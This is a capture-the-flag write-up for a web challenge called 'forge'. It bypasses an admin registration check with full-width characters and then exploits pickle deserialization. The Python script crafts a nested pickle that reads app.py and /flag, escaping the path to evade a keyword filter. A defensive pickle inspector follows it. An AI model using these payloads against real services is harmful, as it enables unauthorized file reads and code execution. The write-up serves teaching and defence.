陇剑杯

web

forge

First you have to log in. Registering a user called admin reports that it already exists, and registering any other user reports that only admin may log in. The registration check is bypassed with full-width characters, which lets you register and reset the admin password.
admin
After logging in, the site lets you upload a .pkl file and run it. An example file is provided; download it and inspect it.

```python
import pickle
import pickletools

# Disassemble the example pickle without loading it
with open("example.pkl", "rb") as f:
    pickletools.dis(f)
```
```text
    0: \x80 PROTO      4
    2: \x95 FRAME      112
   11: \x8c SHORT_BINUNICODE '__main__'
   21: \x94 MEMOIZE    (as 0)
   22: \x8c SHORT_BINUNICODE 'CHIKAWA'
   31: \x94 MEMOIZE    (as 1)
   32: \x93 STACK_GLOBAL
   33: \x94 MEMOIZE    (as 2)
   34: )    EMPTY_TUPLE
   35: \x81 NEWOBJ
   36: \x94 MEMOIZE    (as 3)
   37: }    EMPTY_DICT
   38: \x94 MEMOIZE    (as 4)
   39: (    MARK
   40: \x8c     SHORT_BINUNICODE 'model_name'
   52: \x94     MEMOIZE    (as 5)
   53: \x8c     SHORT_BINUNICODE 'Example'
   62: \x94     MEMOIZE    (as 6)
   63: \x8c     SHORT_BINUNICODE 'data'
   69: \x94     MEMOIZE    (as 7)
   70: C        SHORT_BINBYTES b"cbuiltins\nprint\n(S'chikawa'\ntR."
  103: \x94     MEMOIZE    (as 8)
  104: \x8c     SHORT_BINUNICODE 'parameters'
  116: \x94     MEMOIZE    (as 9)
  117: \x8c     SHORT_BINUNICODE ''
  119: \x94     MEMOIZE    (as 10)
  120: u        SETITEMS   (MARK at 39)
  121: b    BUILD
  122: .    STOP
highest protocol among opcodes = 4
```

The data field holds an embedded pickle stream. When the uploaded .pkl file is run on the site, that data field is deserialized in turn, which is where code execution happens.
Following the layout of example.pkl, write a script that generates a .pkl file of the same shape:

```python
import pickle

# Custom class matching the structure found in example.pkl
class CHIKAWA:
    def __init__(self):
        self.model_name = 'Example1'
        self.data = b"cbuiltins\nprint\n(S'chikawa'\ntR."
        self.parameters = ''

obj = CHIKAWA()
# Hand-built protocol-0 pickle stream for the data field:
# getattr(pathlib.Path, 'read_text')(pathlib.PosixPath('app.py'))
obj.data = b"""cpathlib
Path
p0
cbuiltins
getattr
(g0
S'read_text'
tRp1
cpathlib
PosixPath
(S'app.py'
tRp2
g1
(g2
tR.
"""

# Second version (overrides the one above): the path is written as \u escapes inside a
# V (UNICODE) opcode. A bytes literal leaves "\u002f..." as literal backslash sequences,
# and the unpickler decodes them with raw-unicode-escape when it reads the V opcode.
obj.data = b"""cpathlib
Path
p0
cbuiltins
getattr
(g0
S'read_text'
tRp1
cpathlib
PosixPath
(V\u002f\u0066\u006c\u0061\u0067
tRp2
g1
(g2
tR.
"""


blob = pickle.dumps(obj, protocol=4)
print(pickle.loads(blob))
# Save to file
with open('tast.pkl', 'wb') as f:
    f.write(blob)
```

The stream builds getattr(pathlib.Path, 'read_text')(pathlib.PosixPath('app.py')) to read app.py.
However, the string flag is filtered, so the path is written with Unicode escapes to get past the filter.
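From the defender's side, the reason the filter fails is that it searches the raw bytes while the unpickler decodes opcode arguments. The inspector below is an added example, not code from the writeup: it walks a pickle with pickletools.genops instead of loading it, follows the nested data field into the inner stream, and records the globals imported and the string constants as the unpickler would decode them, so the \u-escaped /flag becomes visible. The outer pickle is constructed here to mirror the example.pkl disassembly above (class name CHIKAWA, fields model_name/data/parameters, FRAME omitted); naive_filter_hit is an assumption about what the challenge's check does.

```python
import io
import pickletools
# Constructed sample (not the real challenge files): same opcode sequence as the writeup's
# inner payload, with "/flag" spelled as \u escapes inside a V (UNICODE) opcode.
INNER = (b"cpathlib\nPath\np0\ncbuiltins\ngetattr\n(g0\nS'read_text'\ntRp1\n"
         b"cpathlib\nPosixPath\n(V\\u002f\\u0066\\u006c\\u0061\\u0067\ntRp2\ng1\n(g2\ntR.")

def _su(s):
    # SHORT_BINUNICODE + MEMOIZE, the pair used throughout the example.pkl disassembly
    data = s.encode("utf-8")
    return b"\x8c" + bytes([len(data)]) + data + b"\x94"

def build_outer(inner):
    # Protocol-4 outer pickle with example.pkl's layout: __main__.CHIKAWA via NEWOBJ/BUILD,
    # state dict {model_name, data (nested pickle bytes), parameters}; FRAME omitted.
    return (b"\x80\x04" + _su("__main__") + _su("CHIKAWA") + b"\x93\x94)\x81\x94}\x94("
            + _su("model_name") + _su("Example") + _su("data")
            + b"C" + bytes([len(inner)]) + inner + b"\x94"
            + _su("parameters") + _su("") + b"ub.")

def naive_filter_hit(blob):
    # Assumed byte-level check of the kind the writeup bypasses: sees only the literal word
    return b"flag" in blob

def inspect_stream(blob):
    """Walk a pickle with pickletools.genops without executing it. Returns (globals, strings):
    the (module, name) pairs the stream imports and the string constants as the unpickler
    would decode them, nested pickle bytes included; None if blob is not a pickle."""
    try:
        ops = list(pickletools.genops(io.BytesIO(blob)))
    except Exception:
        return None
    globs, strs = [], []
    for op, arg, _pos in ops:
        if op.name == "GLOBAL":              # protocol 0: "module name" in a single arg
            globs.append(tuple(arg.split(" ", 1)))
        elif op.name == "STACK_GLOBAL":      # protocol 4: module and name were pushed earlier
            globs.append((strs[-2], strs[-1]))
        elif isinstance(arg, str):           # V/S/SHORT_BINUNICODE args arrive decoded
            strs.append(arg)
        elif isinstance(arg, bytes):         # e.g. the SHORT_BINBYTES 'data' field
            nested = inspect_stream(arg)
            if nested is not None:
                globs.extend(nested[0])
                strs.extend(nested[1])
    return globs, strs

if __name__ == "__main__":
    blob = build_outer(INNER)
    globs, strs = inspect_stream(blob)
    print("naive byte filter sees 'flag':", naive_filter_hit(blob))   # False
    print("imported globals:", globs)
    print("decoded strings mentioning flag:", [s for s in strs if "flag" in s])
```

A gate that compares the recovered globals against an allowlist (and rejects any nested stream outright) catches both versions of the payload, since neither the byte spelling of the path nor the outer wrapper changes what the stream imports.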